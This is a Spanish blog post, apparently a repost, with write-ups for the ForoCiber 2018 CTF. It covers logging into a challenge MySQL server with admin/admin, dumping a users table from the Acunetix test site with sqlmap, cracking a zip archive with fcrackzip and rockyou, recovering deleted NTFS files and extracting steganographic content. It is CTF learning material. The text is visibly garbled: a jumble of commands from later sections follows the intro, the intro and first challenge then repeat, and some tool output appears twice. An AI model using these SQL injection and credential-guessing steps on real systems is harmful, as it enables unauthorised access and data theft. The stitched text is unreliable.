Writeups CTF ForoCiber2018
Este martes con motivo del II Forociber, la Universidad de Extremadura junto con la empresa Viewnext abría un pequeño CTF de 72 horas de duración que planteaba 5 4 retos. Además de ser breve incluía premios como material tecnológico para los tres primeros clasificados, así que decidí dedicarle tiempo y jugar.
La verdad es que resultó entretenido y como el nivel era bastante asequible pude completarlo en tan sólo unas horas, resultando ganador. Sin embargo (zote de mí) no leí en las bases de participación que para optar a los premios la edad máxima era 35 años y mi premio se quedó en un simple reconocimiento (gracias a ToTe de la organización) y, eso sí, la diversión y el entretenimiento de cuándo estuve realizándolo.
Ya comenté que 35 años me parecía un corte absurdo, incluso discriminatorio. Si se buscan promesas, la bajaría si acaso a 25 que es más o menos cuando un estudiante comienza su andadura profesional. ¿Pero 35? a los 30 ya era senior y tenía más tiempo para hacer CTFs... pero en fín, las reglas son las reglas y por lo menos voy a poder dejaros el siguiente post con las soluciones.
RETO 1 - Un Sysadmin perezoso
Retador
Alberto Ledo (@0x13d0): Administrador de Sistemas de la Universidad de Extremadura.
Descripción
Miguel es un sysadmin que forma parte de un proceso de selección para la empresa S2A. La empresa, en la primeras fases del proceso necesita medir los conocimientos generales de administración y seguridad en sistemas de los candidatos, así como los conocimientos que poseen sobre malos hábitos del administrador de sistemas.
Para ello S2A prepara una prueba con la que poder realizar una primera selección de candidatos. Se trata de esta misma prueba. Proporcionan a Miguel la dirección IP de un servidor que llegó a producción cuando aún debía estar en fase de test.
Para superar la prueba Miguel debe encontrar unas palabras escondidas en el algún lugar en el servidor, ¿Ayudas a Miguel?
Materiales
La IP del servidor en el que debe buscar Miguel es: 34.217.203.163
Writeup (10 puntos)
Empezamos como casi siempre con un escaneo de puertos:
# nmap -A -Pn 34.217.203.163
3306/tcp open mysql MySQL 5.5.5-10.1.26-MariaDB-0+deb9u1
55555/tcp open ssh
OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
Vale, tenemos abierto dos puertos. Empezaremos con mysql... Si es un administrador de sistemas perezoso... seguro que las credenciales deben ser totalmente predecibles:
# mysql -u admin -p -h 34.217.203.163
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 437232
Server version: 5.5.5-10.1.26-MariaDB-0+deb9u1 Debian 9.1
Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
Bingo! El usuario es admin y la contraseña admin.
Como veis tenemos una base de datos 'forociber2018' con una tabla 'forociber' que tiene un campo 'flag'...
Y ya tenemos la primera flag: "Y CIBERDERECHO". Continuamos al siguiente...
RETO DOBLE - Ataca a mi web server...
Primero visitamos la url http://www.pentestlab.es/sh.
Sin duda una gran pista... así que vamos a visitar la segunda web http://testphp.vulnweb.com/
Ni que decir tiene que la tabla usuarios contiene lo que buscamos:
# sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users --dump
Y oulá! Accedemos y obtenemos una frase reveladora:
jefe_le_dejo_las_2_palabras_clave_con_las_que_acceder_a_los_
Manuel López Guerra (@CiberPoliES): Analista Forense de la Sección Técnica de la Unidad Central de Investigación Tecnológica de la Policía Nacional.
# mount imagen.raw /mnt/borrar/
# fcrackzip -v -D -u -p /home/vmotos/diccios/rockyou.txt drivers\ pc\ Asus\ manu\ 2012.zip
# unzip drivers\ pc\ Asus\ manu\ 2012.zip
# file drivers\ pc\ manu\ 2012.doc
# unrar "drivers pc manu 2012.doc"
# file ara.jpg
José Aurelio García (@JagmTwit): Auditor y Perito Informático.
# file ForoCTF.img
# ls -al /mnt/borrar
# ntfsundelete ForoCTF.img
# ntfsundelete -u ForoCTF.img -m ForoCiber.jpg
# ntfsundelete -u ForoCTF.img -m Leeme.txt
# cat Leeme.txt
# cat Leeme.txt:adicional.txt
$ strings 000745B0x48.jpg | grep Clave
$ wine jpseek.exe /home/vmotos/extremaydura/000745B0x48.jpg test
La verdad es que resultó entretenido y como el nivel era bastante asequible pude completarlo en tan sólo unas horas, resultando ganador. Sin embargo (zote de mí) no leí en las bases de participación que para optar a los premios la edad máxima era 35 años y mi premio se quedó en un simple reconocimiento (gracias a ToTe de la organización) y, eso sí, la diversión y el entretenimiento de cuándo estuve realizándolo.
Ya comenté que 35 años me parecía un corte absurdo, incluso discriminatorio. Si se buscan promesas, la bajaría si acaso a 25 que es más o menos cuando un estudiante comienza su andadura profesional. ¿Pero 35? a los 30 ya era senior y tenía más tiempo para hacer CTFs... pero en fín, las reglas son las reglas y por lo menos voy a poder dejaros el siguiente post con las soluciones.
RETO 1 - Un Sysadmin perezoso
Retador
Alberto Ledo (@0x13d0): Administrador de Sistemas de la Universidad de Extremadura.
Descripción
Miguel es un sysadmin que forma parte de un proceso de selección para la empresa S2A. La empresa, en la primeras fases del proceso necesita medir los conocimientos generales de administración y seguridad en sistemas de los candidatos, así como los conocimientos que poseen sobre malos hábitos del administrador de sistemas.
Para ello S2A prepara una prueba con la que poder realizar una primera selección de candidatos. Se trata de esta misma prueba. Proporcionan a Miguel la dirección IP de un servidor que llegó a producción cuando aún debía estar en fase de test.
Para superar la prueba Miguel debe encontrar unas palabras escondidas en el algún lugar en el servidor, ¿Ayudas a Miguel?
Materiales
La IP del servidor en el que debe buscar Miguel es: 34.217.203.163
Writeup (10 puntos)
Empezamos como casi siempre con un escaneo de puertos:
# nmap -A -Pn 34.217.203.163
3306/tcp open mysql MySQL 5.5.5-10.1.26-MariaDB-0+deb9u1
55555/tcp open ssh
OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
Vale, tenemos abierto dos puertos. Empezaremos con mysql... Si es un administrador de sistemas perezoso... seguro que las credenciales deben ser totalmente predecibles:
# mysql -u admin -p -h 34.217.203.163
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 437232
Server version: 5.5.5-10.1.26-MariaDB-0+deb9u1 Debian 9.1
Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
Bingo! El usuario es admin y la contraseña admin.
Como veis tenemos una base de datos 'forociber2018' con una tabla 'forociber' que tiene un campo 'flag'...
Y ya tenemos la primera flag: "Y CIBERDERECHO". Continuamos al siguiente...
RETO DOBLE - Ataca a mi web server...
Retador
Fran Moraga (@BTshell): Analista de Inteligencia y Pentester Informático.Descripción
Hola Hacker, tenemos una nueva misión para ti, nos han encargado obtener una información que está contenida en un servidor esta información son dos palabras con las que poder acceder a unso archivos secretos.
Para poder acceder a dicha información necesitamos el nombre de usuario y contraseña para poder acceder al servidor desde el terminal. Dicho terminal se encuentra en l URL: http://www.pentestlab.es/sh. php
Un confidente anonimo nos ha dicho que los datos de acceso los podemos encontrar en la base de datos de la URL: http://testphp.vulnweb.com/ artists.php?artist=1 por lo que en esta primera fase habría que extraer la base de datos de esta URL.
Contamos contigo para obtener dicha información...
Writeup (15 + 20 puntos)
Primero visitamos la url http://www.pentestlab.es/sh. php:
El texto "yn cnffjbeq rf ry ahzreb qr gryrsbab" está ofuscado con Rot13, en claro sería "la password es el numero de telefono".
Sin duda una gran pista... así que vamos a visitar la segunda web http://testphp.vulnweb.com/ artists.php?artist=1:
Esta web es muy conocida, pues es el sitio de prueba del famoso escáner de vulnerabilidades web Acunetix. De sobra sabemos que el vulnerable a SQLi, así que para mayor rapidez usamos sqlmap:
# sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --dbs
La base de datos objetivo es 'acuart' así que sacamos sus tablas:
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart --tables
Ni que decir tiene que la tabla usuarios contiene lo que buscamos:
# sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users --dump
Tenemos el username 'test' y la contraseña. como nos indicaba la pista anterior, es el número de teléfono. Así que sólo queda probar:
Y oulá! Accedemos y obtenemos una frase reveladora:
jefe_le_dejo_las_2_palabras_clave_con_las_que_acceder_a_los_
archivos_secretos___VAIRFGVTNPVBA______SBERAFR_____estan_
cifradas_por_seguridad_estamos_en_contacto
E igual que antes, sólo tenemos que desofuscar con ROT13 las flags finales:
VAIRFGVTNPVBA: INVESTIGACION
SBERAFR: FORENSE
RETO 4 - Un día cualquier como analista forenseRetador
Manuel López Guerra (@CiberPoliES): Analista Forense de la Sección Técnica de la Unidad Central de Investigación Tecnológica de la Policía Nacional.
Descripción
En este apartado como retador, la organización me pide que escriba una historia ficticia para poner en situación a cada uno de los competidores sobre el reto al que se van a enfrentar. No lo voy a hacer, ya que este, no es un reto ficticio. Este es un reto real (las evidencias no), está basado completamente en un caso real que he tenido que resolver como analista forense.
¿Serás capaz de resolver el crimen?
Materiales
Prueba del crimen
Writeup (25 puntos)
El material entregado es un fichero .tar.gz “IMAGEN_DIFU_ForoCIBER_m4nu_GLIDER_Forense_MD5 _e1b316594ff7bf55c8f8488f5aff4a7b.tar.gz”que al desempaquetar/decomprimir arroja, nada más y nada menos, que miles de archivos:
Un archivo sin embargo tiene extensión .info "IMAGEN_ForoCIBER_m4nu_GLIDER_Forense.info", si le echamos un vistazo veremos que lo que tenemos entre manos es un imagen en raw de una adquisición de un S.O. Linux (.dd):
Así que vamos a juntar todos los ficheros, lanzamos el siguiente loop y aprovechamos para tomar un café (tarda unos 30 min.):
# for i in $(ls); do cat $i >> imagen.raw; done
Una vez que tenemos la imagen la montamos para ver su contenido:
# mount imagen.raw /mnt/borrar/
# ls
drivers pc Asus manu 2012.zip index.jpeg rock.jpeg Slider-Web-Ciber_.jpg yeah.zip
Hay varios archivos comprimidos con contraseña y una imagen "rock.jpg" es más que suficiente pista para saber que tenemos que realizar un ataque de diccionario con el famoso rockyou.txt:
# fcrackzip -v -D -u -p /home/vmotos/diccios/rockyou.txt drivers\ pc\ Asus\ manu\ 2012.zip
found file 'drivers pc manu 2012.doc', (size cp/uc 986146/986349, flags 9, chk a390)
PASSWORD FOUND!!!!: pw == chocolate
Vale, hemos encontrado la password del archivo "drivers pc Asus manu 2012.zip", veamos su contenido:
# unzip drivers\ pc\ Asus\ manu\ 2012.zip
Archive: drivers pc Asus manu 2012.zip
[drivers pc Asus manu 2012.zip] drivers pc manu 2012.doc password:
inflating: drivers pc manu 2012.doc
Tenemos un archivo doc... que realmente es un rar:
# file drivers\ pc\ manu\ 2012.doc
drivers pc manu 2012.doc: RAR archive data, v4, os: Win32
Lo descomprimimos:
# unrar "drivers pc manu 2012.doc"
unrar 0.0.1 Copyright (C) 2004 Ben Asselstine, Jeroen Dekkers
Extracting from /home/vmotos/Escritorio/extremaydura/4.forense/extraido/drivers pc manu 2012.doc
Extracting drivers pc manu 2012/ara.jpg OK
Extracting drivers pc manu 2012/ciberpoli.jpg OK
Extracting drivers pc manu 2012/felicitacionnavidad2018.gif OK
Extracting drivers pc manu 2012/glider_retro.jpg OK
Extracting drivers pc manu 2012/reto.jpg OK
Extracting drivers pc manu 2012/secret.png OK
All OK
Y en una de esas imágenes tenemos en sus metadatos la flag final del reto:
# file ara.jpg
ara.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment
length 16, Exif Standard: [TIFF image data, big-endian, direntries=4, manufacturer=fl4g->
INFORMATICA, model=X-T10], baseline, precision 8, 511x340, frames 3
RETO 5 - Lo que ves puede no ser lo que hay...
Retador
José Aurelio García (@JagmTwit): Auditor y Perito Informático.
Descripción
Alguien ha enviado un archivo con una palabra, oculto en alguna parte de un fichero IMG, mediante técnicas esteganográficas. Debes encontrar "la palabra mágica".
Recuerda: los límites de la esteganografía están allí donde estén los límites de tu imaginación.
Materiales:
ForoCTFWriteup (30 puntos):
En el último reto nos facilitan otra imagen:
# file ForoCTF.img
ForoCTF.img: DOS/MBR boot sector, code offset 0x52+2, OEM-ID "NTFS ",
sectors/cluster 8, Media descriptor 0xf8, sectors/track 63, heads 255, hidden sectors 2048,
dos < 4.0 BootSector (0x0), FAT (1Y bit by descriptor); NTFS, sectors/track 63, physical
drive 0x80, sectors 40959, $MFT start cluster 1706, $MFTMirror start cluster 2,
bytes/RecordSegment 2^(-1*246), clusters/index block 1, serial number
0d0247d9c247d866e
Vemos que el sistemas de ficheros es NTFS así que procedemos a montarlo:
# ntfs-3g ForoCTF.img /mnt/borrar
# ls -al /mnt/borrar
total 5528
drwxrwxrwx 1 root root 4096 feb 24 23:12 .
drwxr-xr-x 3 root root 4096 feb 27 15:26 ..
drwxrwxrwx 1 root root 0 feb 24 22:22 HxDSetupES
drwxrwxrwx 1 root root 0 feb 24 23:12 Imagenes
drwxrwxrwx 1 root root 0 feb 24 22:22 jphs05
-rwxrwxrwx 1 root root 83456 sep 10 2015 MD5_and_SHA_Checksum_Utility.exe
-rwxrwxrwx 1 root root 5562976 feb 17 06:32 RecuvaSetup153.exe
drwxrwxrwx 1 root root 0 feb 24 22:21 System Volume Information
Las herramientas son más que reveladoras... Si aparece Recuva está claro que hay que recuperar algunos archivos borrados, pero para tal cometido utilizaré simplemente ntfsundelete:
# ntfsundelete ForoCTF.img
Inode Flags %age Date Time Size Filename
-----------------------------------------------------------------------
16 F..! 0% 1970-01-01 01:00 0
17 F..! 0% 1970-01-01 01:00 0
18 F..! 0% 1970-01-01 01:00 0
19 F..! 0% 1970-01-01 01:00 0
20 F..! 0% 1970-01-01 01:00 0
21 F..! 0% 1970-01-01 01:00 0
22 F..! 0% 1970-01-01 01:00 0
23 F..! 0% 1970-01-01 01:00 0
49 FN.. 100% 2018-02-24 19:53 438684 ForoCiber.jpg
52 FR.. 100% 2018-02-24 20:03 178 Leeme.txt
53 F..! 0% 1970-01-01 01:00 0
54 F..! 0% 1970-01-01 01:00 0
55 F..! 0% 1970-01-01 01:00 0
56 F..! 0% 1970-01-01 01:00 0
57 F..! 0% 1970-01-01 01:00 0
58 F..! 0% 1970-01-01 01:00 0
59 F..! 0% 1970-01-01 01:00 0
...
17 F..! 0% 1970-01-01 01:00 0
18 F..! 0% 1970-01-01 01:00 0
19 F..! 0% 1970-01-01 01:00 0
20 F..! 0% 1970-01-01 01:00 0
21 F..! 0% 1970-01-01 01:00 0
22 F..! 0% 1970-01-01 01:00 0
23 F..! 0% 1970-01-01 01:00 0
49 FN.. 100% 2018-02-24 19:53 438684 ForoCiber.jpg
52 FR.. 100% 2018-02-24 20:03 178 Leeme.txt
53 F..! 0% 1970-01-01 01:00 0
54 F..! 0% 1970-01-01 01:00 0
55 F..! 0% 1970-01-01 01:00 0
56 F..! 0% 1970-01-01 01:00 0
57 F..! 0% 1970-01-01 01:00 0
58 F..! 0% 1970-01-01 01:00 0
59 F..! 0% 1970-01-01 01:00 0
...
# ntfsundelete -u ForoCTF.img -m ForoCiber.jpg
Inode Flags %age Date Time Size Filename
-----------------------------------------------------------------------
49 FN.. 100% 2018-02-24 19:53 438684 ForoCiber.jpg
Undeleted 'ForoCiber.jpg' successfully.
# ntfsundelete -u ForoCTF.img -m Leeme.txt
Inode Flags %age Date Time Size Filename
-----------------------------------------------------------------------
52 FR.. 100% 2018-02-24 20:03 178 Leeme.txt
Undeleted 'Leeme.txt' successfully.
Undeleted 'Leeme.txt:adicional.txt' successfully.
Files with potentially recoverable content: 1
Vaya, vaya... al recuperar Leeme.txt hemos recuperado también otro regalo adicional:
# cat Leeme.txt
En este Volumen hay una imagen en la que se encuentra la soluci � n de este ciberreto.
Tienes Todo lo que necesitas aqu � .
��� nimo!!
# cat Leeme.txt:adicional.txt
Esta imagen es en verdad un EstegoContenedor. La clave de Descifrado la tienes en esta r�plica, en Mega:
https://mega.nz/#!AS5CwbrK!2A2VkdMXZGJVEpbhom3R7ffITKCTN9lDzOuDx_U733o
Tenemos otra imagen que según nos anuncian contiene la clave de descifrado, y su nombre está en hexadecimal.. pero ni si quiera nos hace falta usar un editor hexadecimal, basta un simple strings:
$ strings 000745B0x48.jpg | grep Clave
---La Clave de Descifrado de JpHide es "CTFConseguido", sin las comillas.i
Así que con la password usamos la herramienta de esteganografía jseek y:
$ wine jpseek.exe /home/vmotos/extremaydura/000745B0x48.jpg test
Welcome to jpseek Rev 0.51
(c) 1998 Allan Latham
This program is freeware.
No charge is made for its use.
Use at your own risk. No liability accepted whatever happens.
Contains cryptogaphy which may be subject to local laws.
Passphrase:
$ cat test
Has Superado Tu reto!!!!
La palabra que debías adivinar es
CIBERMOOC
¡¡felicidades!!!
This program is freeware.
No charge is made for its use.
Use at your own risk. No liability accepted whatever happens.
Contains cryptogaphy which may be subject to local laws.
Passphrase:
$ cat test
Has Superado Tu reto!!!!
La palabra que debías adivinar es
CIBERMOOC
¡¡felicidades!!!
Con esto completé los 4-5 retos, mandé el correspondiente informe de evidencias y...
LMAO! Espero que os haya gustado. Me retiro al asilo, nos vemos en el siguiente!
Via: www.hackplayers.com
Writeups CTF ForoCiber2018
Reviewed by Zion3R
on
15:30
Rating: